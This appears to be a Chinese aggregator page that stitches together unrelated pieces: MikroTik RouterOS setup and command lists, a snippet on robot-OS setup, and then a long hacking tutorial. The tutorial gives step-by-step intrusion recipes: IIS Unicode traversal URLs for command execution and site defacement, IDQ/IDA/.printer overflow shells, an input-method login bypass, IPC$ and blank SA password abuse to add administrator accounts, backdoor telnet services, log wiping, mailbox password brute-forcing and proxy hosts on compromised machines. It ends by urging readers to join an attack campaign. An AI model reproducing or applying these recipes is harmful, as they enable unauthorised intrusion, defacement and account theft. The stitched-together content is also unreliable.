導航:首頁 > 程序命令 > rostelnet命令

rostelnet命令

發布時間:2023-06-15 22:17:58

Ⅰ ros 2.9.27 的破解命令是什麼

設置好要安裝的router,按A,再按 I,接著按N,再按Y,稍等安裝2.927中,,,提示按回車重新啟動機器,啟動後提示按Y,然後進入登入界面(我的是破解版所以到登入界面),輸人默讓帳號admin,密碼為空,進人後輸入y回車,再Q回車,接著我查看網卡:命令看下面操作:interface--print,硬體正常的情況下,設置網卡名稱網路:set 0 name = lan 意思是設置0的網卡為區域網用的網卡 ,set 1 name = wan ,意思是設置1的網卡為外網電信網卡用的標示,接著看操作:按/返回主操作面,setup安裝,按A---再回車設置你要設置的區域網IP:192.168.1.1/24 (看清楚是區域網lan)回車,設置網關 0.0.0.0回車,接著退出按X,按2次,接下來ping 192.168.1.1 能通設置證明 成功,然後用IE打開http://192.168.1.1 進網站下載左上角的winbox 進人以下的設置:

routet os 設置好lanIP 後 用http://IP 下載winbox 進入以下操作:

給你的網卡改名字,這個是個好習慣!

interfaces -----> ether2-->lan ether1-->wan

接著給另一個網卡添加IP 也就是電信或者是網通給你的IP地址(外網IP)

ip--->address----> + 如果你有路由表的話,可以用FTP上傳到路由上

如下表:

Address Network Broadcast interface

IP: 外網IP/29 外網IP 外網IP wan

192.168.1.0/23 192.168.0.0 192.168.1.255 lan

現在就要做nat共享上網了。

在ip--->firewall-->nat

增加一條規則 src.address 這里寫自己整個網段!

網段為192.168.1.0-192.168.1.255就寫這樣192.168.1.0/23

action 里選 masquerade 這樣就可以了,這樣網吧就可以上網了

3步:限速腳本的編寫! 防火牆腳本(包括防SYN的)

4、綁定ARP

用超級管理員賬號登錄,IP-----ARP,這樣可以看到 一行行的 IP和MAC地址,"
這些就是內網有網路活動的計算機。選中一個,雙擊,點右下角的TOOLS----,選COPY----點OK,依次

進行,全部綁定後,來到WINBOX的INTERFACE選項,雙擊內網網卡,在ARP選項里,選擇「replay-only」

至此,通過ROS綁定IP完畢,這樣下面客戶機只要一改IP,那麼它就無法和網關進行通訊了,當然也無法

使主機吊線了。

5、怎麼樣把ROS的各種設定導出(共享?) 使用export命令導出,使用import命令導入。
如:導出全部配置命令為:/export file=xxxw
導入配置命令:/import file=xxx
導出防火牆配置的命令:/ip firewall export file=xxx
備份設置:files-->backup 再用ftp client download備份文件
恢復設置:ftp client upload 備份文件;files --> restore2G

6、備份和恢復設置
用WINBOX登陸,注意用ADMIN帳號,在左邊是不是有個FILES,點對話框上面的BACKUP,這樣就把當前的

設置保存一個文件裡面了,再用IE登陸你的路由,用ftp://網管帳號:密碼@路由IP:埠,登陸到你的路

由後就會到你保存的文件了!用IE直接下載吧!

當你重新安裝時,只要把內網弄通,用IE再登陸你的路由,把這個設置文件傳上去,在WINBOX左邊下面有

個TE開頭的英文,這是終端模擬,點開後就像在路由上操作一樣,用以下命令恢復你以前的設置:
system回車

backup回車

load name=你保存的設置文件名 回車

提示重啟就一下子恢復到你以前設置了

是不是方便實用啊?

大家可能會說用WINBOX備份不爽,那我們也可以用終端備份呀!

在WINBOX左邊下面有個telnet開頭的英文,這是終端模擬,點開後就像在路由上操作一樣,用以下命令備

份你以前的設置:

system回車

backup回車

save name=你保存的設置文件名 回車

建議文件名用日期表示可以很直觀。這樣就按你的文件名保存了。

用LOAD NAME命令就是恢復了。。。

如果設錯了規則或者地址,造成win不能進入管理界面,可以這樣復原:
使用 admin 登陸
system 回車
reset 選擇 y
將刪除所有改動,恢復新裝的狀態

這個是恢復到出廠設置,很適合剛開始設置ROUTEOS時用用!

15、備份ROUTEOS

可以用GHOST8。0備份,注意是要用全盤備份,DISK TO IMG才行

Ⅱ ROS軟路由常用命令有哪些

作為不同網路之間互相連接的樞紐,路由器系統構成了基於TCP/IP 的國際互聯網路Internet 的主體脈絡,也可以說,路由器構成了Internet的骨架。這篇文章主要介紹了ROS軟路由常用命令 小結,需要的朋友可以參考下

具體介紹

1 accept: 接受

add-dst-to-address-list - 把一個目標IP地址加入address-list

add-src-to-address-list - 把一個源IP地址加入address-list

2 drop - 丟棄

3 jump - 跳轉,可以跳轉到一個規則主題裡面,如input forward,也可以跳轉到某一條裡面

4 log - 日誌記錄

5 passthrough - 忽略此條規則

6 reject - 丟棄這個包,並且發送一個ICMP回應消息

7 return - 把控制返回給jump的所在

8 tarpit - 捕獲和扣留 進來的TCP連接 (用SYN/ACK回應進來的TCP SYN 包)router os命令:

看了很多router os 的資料都是關於如何安裝的,卻很少見到關於router os的命令資料(也許因為有winbox了),雖然在router os 的手冊中有說明,但是是英文版本的,很不好看懂。下面就我就寫出一些常用的命令,希望對大家有所幫助:

1、開機登陸以後常用的一個 ? 是常用的幫助命令,可以列出可用的命令及簡單的說明。

2、有些英文命令很長,可以簡寫如inte***ce ,你輸入in後回車自動就會進入inte***ce了。或者你可以按下tab鍵來幫你完成長英文命令的輸入。

3、有些命令的參數很多,你不知道的時候可以輸入命令後加空格?,如print ?可以顯示該命令的參數。

4、setup 該命令可是誰都要記得的,因為最初安裝完router os 必須用它分配網卡的ip地址。

5、ip route add gate=211.12.*.14,220.163.*.12 該命令用於多線路接入時加入多個網關用的。

6、ip firewall add action=nat protocol=tcp dst-address=212.12.*.*/32:80 to-dst-address=192.168.0.198 該命令用於映射埠80到本地的192.168.0.198上。

7、print 該命令有點用於列出所有的項目。

8、inte***ce monitor-traffice 0,1,2 可以監視當前0,1,2網卡的活動情況。

9、ip firewall connection print 顯示當前的所有的連接。

10、ip arp print 顯示所有router os 知道的ip地址和mac地址的對應列表。

11、user active print 顯示所有的router os 的活動用戶。

12、system reboot 、system shutdown分別是重啟和關機。

13、system reset 刪除所有原來的配置,並重新啟動router os. 14、system resource monitor 可以監視當前的cpu,和內存的使用情況。

15、log print 可以顯示router os 的日誌。

16、tool ping-speed 210.13.14.* 可以顯示ping 的速度。

17、tool sniffer start,和tool sniffer stop 可以開啟和停止嗅探器。

18、tool sniffer packet print 可列出嗅探的包。

19 、system backup name=2004107.bak 可以將系統的配置備份到文件2004107.bak,可以用file print看到。

還有什麼enable,disable,remove,set 那些常用的就不說了。

相關閱讀:路由器安全特性關鍵點

由於路由器是網路中比較關鍵的設備,針對網路存在的各種安全隱患,路由器必須具有如下的安全特性:

(1)可靠性與線路安全 可靠性要求是針對故障恢復和負載能力而提出來的。對於路由器來說,可靠性主要體現在介面故障和網路流量增大兩種情況下,為此,備份是路由器不可或缺的手段之一。當主介面出現故障時,備份介面自動投入工作,保證網路的正常運行。當網路流量增大時,備份介面又可承當負載分擔的任務。

(2)身份認證路由器中的身份認證主要包括訪問路由器時的身份認證、對端路由器的身份認證和路由信息的身份認證。

(3)訪問控制對於路由器的訪問控制,需要進行口令的分級保護。有基於IP地址的訪問控制和基於用戶的訪問控制。

(4)信息隱藏與對端通信時,不一定需要用真實身份進行通信。通過地址轉換,可以做到隱藏網內地址,只以公共地址的方式訪問外部網路。除了由內部網路首先發起的連接,網外用戶不能通過地址轉換直接訪問網內資源。

(5)數據加密

為了避免因為數據竊聽而造成的信息泄漏,有必要對所傳輸的信息進行加密,只有與之通信的對端才能對此密文進行解密。通過對路由器所發送的報文進行加密,即使在Internet上進行傳輸,也能保證數據的私有性、完整性以及報文內容的真實性。

(6)攻擊探測和防範

路由器作為一個內部網路對外的介面設備,是攻擊者進入內部網路的第一個目標。如果路由器不提供攻擊檢測和防範,則也是攻擊者進入內部網路的一個橋梁。在路由器上提供攻擊檢測,可以防止一部分的攻擊。

(7)安全管理

Ⅲ 機器人操作系統ROS--初始化測試(三)

在使用 ROS 之前,需要先初始化 rosdep。rosdep 使得你可以為你想要編譯源碼,以及需要運行的 ROS 核心組件,簡單地安裝系統依賴。

環境設置:
然後再初始化環境變數:(每次啟動一個新的終端時,ROS 環境變數都能自動地添加進你的 bash )
一定要運行以下命令,才可啟動:

如果安裝了多個 ROS 發行版,則 ~/.bashrc 必須只 source 當前正在使用的那一版的 setup.bash。
如果你只想要修改當前 shell 的環境,則輸入如下的命令來替換上面的命令:

注意: turtlesim 的運行依賴於 roscore 的運行,因此在測試 turtlesim 需要同時運行 roscore,也就是同時再打開一個終端運行。

出現一隻隨機的烏龜

Ⅳ ROS無法使用telnet操作,winbox下想添加腳本scripts的添加按鈕灰色

由於網上很多朋友問我怎麼入侵別人的機器,所以整理了一些我認為容易學的漏洞入侵方法,希望能給初學者一些幫助,下面講的內容很簡單,高手就不用浪費時間看了,:)

(1) UNICODE漏洞入侵
「Uicode漏洞」是微軟IIS的一個重大漏洞。2001年最熱門漏洞之一。
第一步,運行RANGSCAN掃描器,會出現掃描窗口,在最上面有兩個from的橫框,這是讓你填一段IP范圍的。在第一個框里填入啟始域(打個比方,比如你要掃192.168.0.1至192.168.0.255)那麼你在第一個框里就填入192.168.0.1,在to 後面的框里填入192.168.0.255 意思就是掃192.168.0.0至192.168.0.255這段范圍里有UNICODE漏洞的機器。接著在中間有一個添加的橫框,是要填入內容的如:
/scripts/..%c0%af../winnt/system32/cmd.exe
這句話的意思是掃描有 %c0%af 漏洞的機器,對象一般是英文的WIN2000機。
我們把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按「掃描」。就看到RANGSCAN開始掃了。這時就要看你選的IP范圍有漏洞的機器多不多了,如果你選的IP范圍好,呵,很快在掃描結果框里就會顯示掃到的漏洞主機
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主機有 %c0%af 漏洞,
目標有了,我們馬上打開瀏覽器。在網址欄里輸入:
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回車
意思是查看機器里C盤的根目錄。一般情況下,我們都可以在瀏覽器里看到類似如:
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p <DIR> Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a <DIR> Inetpub
2002-01-19 10:37p <DIR> MSSQL7
2002-03-09 04:22p <DIR> Program Files
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目錄列表。也會碰到看不到文件的空目錄。
好,我們成功看到了機器里的C盤了。
我們在瀏覽器里輸入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回車
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈,我們看到了機器設置內容了,我們找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主頁存放在c:\inetpub\wwwroot的目錄里,知道就好辦了。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回車
我們就可以看到c:\inetpub\wwwroot目錄里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我們以目錄里有index.asp做例子。
我們先要做的是把文件的只讀屬性解除掉,很多管理員都把文件設置只讀。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回車
當看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你,你可以改他的網頁了。
----------------------------------------
但如果你看到下面的英文就不成功,只好換其他機器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
繼續。現在用ECHO改網頁的內容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+網站有漏洞+> c:\inetpub\wwwroot\index.asp 回車
當看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示,你已經改了他的網頁了,呵呵,你想改成什麼字也行。只要把命令中的中文換成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代碼:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

(2) Windows2000輸入法漏洞
先用埠掃描器掃描開放3389的機器,然後用終端客戶端程序進行連接,用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現輸入法狀態條,在輸入法狀態條上按滑鼠右鍵。選擇「幫助」 —— 「輸入法指南」 —— 「選項」。(如果發現「幫助」呈灰色,放棄,因為對方很可能發現並已經補上了這個漏洞。)按右鍵,選擇「跳轉到URL」,輸入:c:\winnt\system32在該目錄下找到「net.exe」,為「net.exe」創建一個快捷方式,右鍵點擊該快捷方式,在「屬性」 —「目標」—c:\winnt\system32\net.exe 後面空一格,填入「user guest /active :yes」。 點擊「確定」(目的是,利用「net.exe」激活被禁止使用的guest賬戶)運行該快捷方式。(此時你不會看到運行狀態,但guest用戶已被激活。)然後重復操作上面的,在 「屬性」 —— 「目標」—— c:\winnt\system32\net.exe 後面空一格,填入localgroup administrators guest /add(這一步驟目的是,利用「net.exe」將guest變成系統管理員。)再次登錄終端伺服器,以「guest」身份進入,此時guest已是系統管理員,已具備一切可執行權及一切操作許可權。現在,我們可以像操作本地主機一樣,控制對方系統。
(3) idq溢出漏洞
要用到3個程序,一個Snake IIS IDQ 溢出程序GUI版本,一個掃描器,還有NC。
首先掃描一台有IDQ漏洞的機器,然後設置Snake IIS IDQ 溢出程序,在被攻擊IP地址後面寫上對方的IP.埠號一般不需要改動,軟體的默認綁定CMD.EXE的埠是813.不改了.用默認的,左面選擇操作系統類型,隨便選一個,我們選IIS5 English Win2k Sp0吧,點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了,然後我們用NC來連接。
進入MS-DOS。進入「nc」的目錄。然後:nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看來沒成功. 別灰心,在來一次,換用IIS5 English Win2k Sp1試試。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈,終於上來啦,你現在可是system許可權,下面該怎麼做就看你的啦。

(4)IDA溢出漏洞
所用程序:idahack
進入MS-DOS方式(假設idq.exe在c:\下)
c:\idahack.exe
運行參數:c:\idahack <host> <hostport> <hosttype> <shellport>
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
好 luck 
好,現在你可以telnet它的80埠了,我們用NC來連接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
(C)版權所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK,現在我們現在上來了,也可IDQ一樣是SYSTEN許可權,盡情的玩吧。

(5).printer漏洞
這個漏洞,我們用兩個程序來入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p

usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort>
用法: D:\IIS5HACK <溢出的主機> <主機的埠> <主機的類型> <溢出的埠>
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
好 luck

溢出成功!
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK,我們又成功取得system許可權!玩吧。

(6)139埠入侵
我們先確定一台存在139埠漏洞的主機。用掃描工具掃描!比如SUPERSCAN這個埠掃描工具。假設現在我們已經得到一台存在139埠漏洞的主機,我們要使用nbtstat -a IP這個命令得到用戶的情況!現在我們要做的是與對方計算機進行共享資源的連接。
用到兩個NET命令,下面就是這兩個命令的使用方法
NET VIEW?
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
參數介紹:?
<1>鍵入不帶參數的net view顯示當前域的計算機列表。?
<2>\\computername 指定要查看其共享資源的計算機。?
<3>/domain[:domainname]指定要查看其可用計算機的域?

NET USE?
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
參數介紹:?
鍵入不帶參數的net use列出網路連接。?
devicename指定要連接到的資源名稱或要斷開的設備名稱。?
\\computername\sharename伺服器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。?
domainname指定另一個域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網路連接。?
/persistent控制永久網路連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經看到對方共享了他的C,D,E三個盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現在我們已經得到的139埠漏洞的主機IP地址和用戶名,現在就該是我們進入他計算的時候了,點擊開始---查找--計算機,將剛才找到的主機名字輸入到上面,選擇查找,就可以找到這台電腦了!雙擊就可以進入,其使用的方法和網上領居的一樣。

(7)IPC入侵
所有程序:流光
開始:在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。輸入我們要破解的IP段,我們把「將FrontPage主機自動加入HTTP主機列表取消了」。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機。在「輔助主機」那裡的「IPC$主機」前面打勾,然後在菜單了選「探測」,,掃描出結果以後,「IPC$主機」,選中後按「CTRL+F9」就開始探測IPC用戶列表。會出現「IPC自動探測」
的窗體,把那兩個選項都選了,然後點「選項」 為了加快弱口令掃描速度,這里的兩個選項我們可以全部取消記住。然後點「確定」出來後點「是」就開始探測了。一會兒,結果出來了。比如我們探測出了用戶名為「admin」的管理員,密碼為「admin」,現在我們用命令提示符,熟悉下命令吧,輸入:
net use file://對方ip/ipc$ "密碼" /user:"用戶名" || 建立遠程連接
icmd.exe file://對方ip/admin$ || admin$是對方的winnt目錄
net time file://對方IP/ || 看看對方的本地時間
at file://對方ip/ 啟動程序的時間 啟動程序名 啟動程序的參數 || 用at命令來定時啟動程序
telnet 對方ip 埠

我們也可以改網頁:
net use \\ip\ipc$ "admin" /uesr:"admin" 回車。
出現「命令成功完成」。
然後輸入「dir \\ip\c$\*.*」
看到C:下所有內容。現在我們來改主頁。一般主頁放在c:\inetpub\wwwroot裡面
輸入「dir \\ip\c$\inetpub\wwwroot\*.*」。就可以看到index.htm或index.asp或default.htm或 default.asp.這些就是主頁了,假如你黑頁在C:下,就輸入" 主頁文件 \\ip\c$\inetpub\wwwroot"覆蓋原文件這樣就行了,簡單吧?

日誌清除,斷開連接 :
我們 cl.exe ,clear.exe 上去,再執行,就可以清除日誌,比如clear all :清除所有的日誌。然後在斷開連接:net use file://ip/ipc$ /delete

(8)超管SA空密碼漏洞
使用的工具:流光IV
啟動流光,按Ctrl+R。出現掃描設置對話框,設置掃描IP段,並且選擇掃描的類型為SQL。點擊「確定」,進行掃描,假設我們取得主機:127.0.0.1,然後點擊「工具」 —— SQL遠程命令(或者Ctrl+Q),填入主機IP(127.0.0.1)、用戶(sa)、密碼(空)點擊「連接」,出現遠程命令行的界面。
net user heiying heiying1 /add 填加一個heiying的帳號和密碼heiying1
net localgroup administrators heiying /add 將我們創建的heiying帳號填加到管理組。
下面我們來做跳板:
打開cmd.exe,輸入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
顯示命令成功完成。
上傳srv.exe:
srv.exe \\127.0.0.1\admin$\system32
上傳ntlm.exe:
ntlm.exe \\127.0.0.1\admin$\system32
啟動服務:
首先用net time \\127.0.0.1
看看對方主機的時間,(假如回顯\\127.0.0.1 的本地時間是上午12.00),然後我們用at \\2127.0.0.1 12.01 srv.exe命令來啟動srv.exe。等一分鍾後就可以telnet了。
一分鍾後在本機命令提示符中輸入:
telnet X.X.X.X 99
然後我們要啟動NTLM.exe:
在telnet狀態下直接輸入ntlm回車。
顯示:windows 2000 telnet mp,by assassin,all rights reserved.done!
然後從新啟動對方主機的telnet服務:net stop telnet(先關閉telnet服務)再輸入net start telnet(啟動telnet服務)然後我們退出telnet,然後在命令行下輸入telnet 127.0.0.1,依照提示,接著輸入用戶名:heiying,密碼:heiying1,回車。這樣,我們的跳板就做好了,簡單吧?
(上面上傳的srv和ntlm等東東還有一個簡便方法,全都可以直接用流光工具菜單里的種植者上傳,60秒後自動運行,不用敲命令!呵呵~~~~方便吧!)

(9)如何用流光破解信箱密碼
這次的目標是21CN,運行流光IV,選擇POP3主機----右鍵----編輯----添加,填上:pop.21cn.com,其他的就用默認吧!不用更改,確定就行了。到下一步,還是右鍵-----從列表中添加------選擇一個字典,沒有的到網上下載一個字典,或者到黑白網路去下載,我們用簡單模式探測!這樣速度比較快,然後就等著成果吧,上次我以下就破了5個郵箱出來。

(10)frontpage進行攻擊
打開您自己的Frontpage,文件菜單下選擇「打開站點」,然後在文件夾框里寫入http://127.0.0.1(http://不要漏掉)。按下「打開」按鈕,一會後,出現了文件夾,成功了,現在就可以操作網頁文件了。如果跳出錯誤信息,表示有密碼,我們用以下http://127.0.0.1/_vti_pvt/service.pwd,這是默認的密碼文件,下載下來,找個解密器破密碼吧!破出來後就還可以改網頁。這個只能改該網頁,沒什麼玩的。

(11)用肉雞做SOCK5代理跳板
需要軟體:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
首先我們在命令提示符下建立IPC$管道:
net use \\127.0.0.1\ipc$ "密碼" /user:帳號
通道建立好後,我們把srv.exe sss.exe ntlm.exe全部上傳。
c:\ srv.exe \\10.10.10.10\admin$
1 files copied!
c:\ ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\ sss.exe \\10.10.10.10\admin$
1 files copied!
復制完畢後,
看肉雞上現在的時間:
c:\net time \\127.0.0.1
顯示當前時間是 2002/4/13 晚上 09:00
我們來啟動srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09:01後。我們來連接肉雞:
c:\telnet 127.0.0.1 99
連上後顯示:
c:\winnt\system32>
接著我們啟動NTLM.exe
c:\winnt\system32>ntlm
顯示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我們終止srv.exe的telnet服務:
C:\WINNT\system32>net stop telnet
繼續:
C:\WINNT\system32>net start telnet
再啟動TELNET。
OK,我們來登陸
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了,一切順利,我們現在正式開始做代理:
c:>sss.exe -install <---------開始安裝
顯示:
c:>sksockserver installed!
來看看配置:
c:>sss -config show
顯示:
SkServer Port = 1813 <----開放服務的埠 ,我們記著這個1813埠哦
SkServer StartType: 3 - Manual <---服務啟動方式
SkServer Enable Client Set Num:0 <---客戶端的項目個數
SkServer Pass SkServer Number:0 <---經過SkServer的項目個數

來啟動服務:
c:>net start skserver
提示你正在啟動,並且完成。
來檢查一下是不是啟動了:
c:>net start <-----------看看啟動的服務列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它,呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了,到這里我們已經做好了一個socks5代理了,我們自己的哦.OK,下面我們用sockscap來使用我們做代理。
安裝好SocksCap後,我們在桌面上打開SocksCap V2,點開File選項選Settings...彈出卡片,在 SOCKS Server裡面我們填肉雞的IP:127.0.0.1,PortT填默認的1813埠,下面的我們選socks version 5,呵呵,和 Attempt local then remot,這是域名解析的順序,先本地,然後才遠程。設置完了點「確定」我們就可以使用了,添加應用程序到sockscap裡面,點開那個"new"按鈕,會彈出一個卡片,
Profile name :程序名,隨便寫。
Command Line: 命令行,點後面的Browse...找到你的程序路徑
Working:填好上面那個,這個就自動加上.
這樣我們就把程序加到SocksCap裡面了。
現在們可以雙擊裡面的程序來使用,也可以選住程序在點"Run"來運行。

好了,終於寫完了,上面的內容都很簡單,很適合初學者,還望高手們不好見笑,剛好聽說這次5.1有很多聯盟有所行動,希望上面的內容能教會一部分人,少走彎路,讓更多的人參與這次行動。UNIX和LINUX由於自己的功力也還不夠,還差很遠,所以還不敢寫。

閱讀全文

與rostelnet命令相關的資料

熱點內容
伺服器磁碟滿了文件刪不掉該如何處理 瀏覽:847
壓縮彈簧展開長度 瀏覽:509
如何共享國外app 瀏覽:687
淘寶app如何掃描圖片 瀏覽:594
反編譯作業幫 瀏覽:856
釘釘打卡伺服器過什麼意思 瀏覽:139
鏤空加密隔斷牆效果圖 瀏覽:539
windows7怎麼安裝證書伺服器 瀏覽:952
證券業務的程序員 瀏覽:202
u點伺服器wifi密碼如何設置 瀏覽:864
寶馬x5大燈編程 瀏覽:673
python安裝和使用 瀏覽:381
加密的門禁卡復制了用不了 瀏覽:714
javacsv讀寫 瀏覽:806
ug編程教程pdf 瀏覽:763
latex編譯軟體安卓版 瀏覽:248
如何在信合app上交居民醫保 瀏覽:109
丑惡pdf 瀏覽:365
陝西定頻壓縮機銷售公司 瀏覽:795
安卓系統如何幫人打王者 瀏覽:427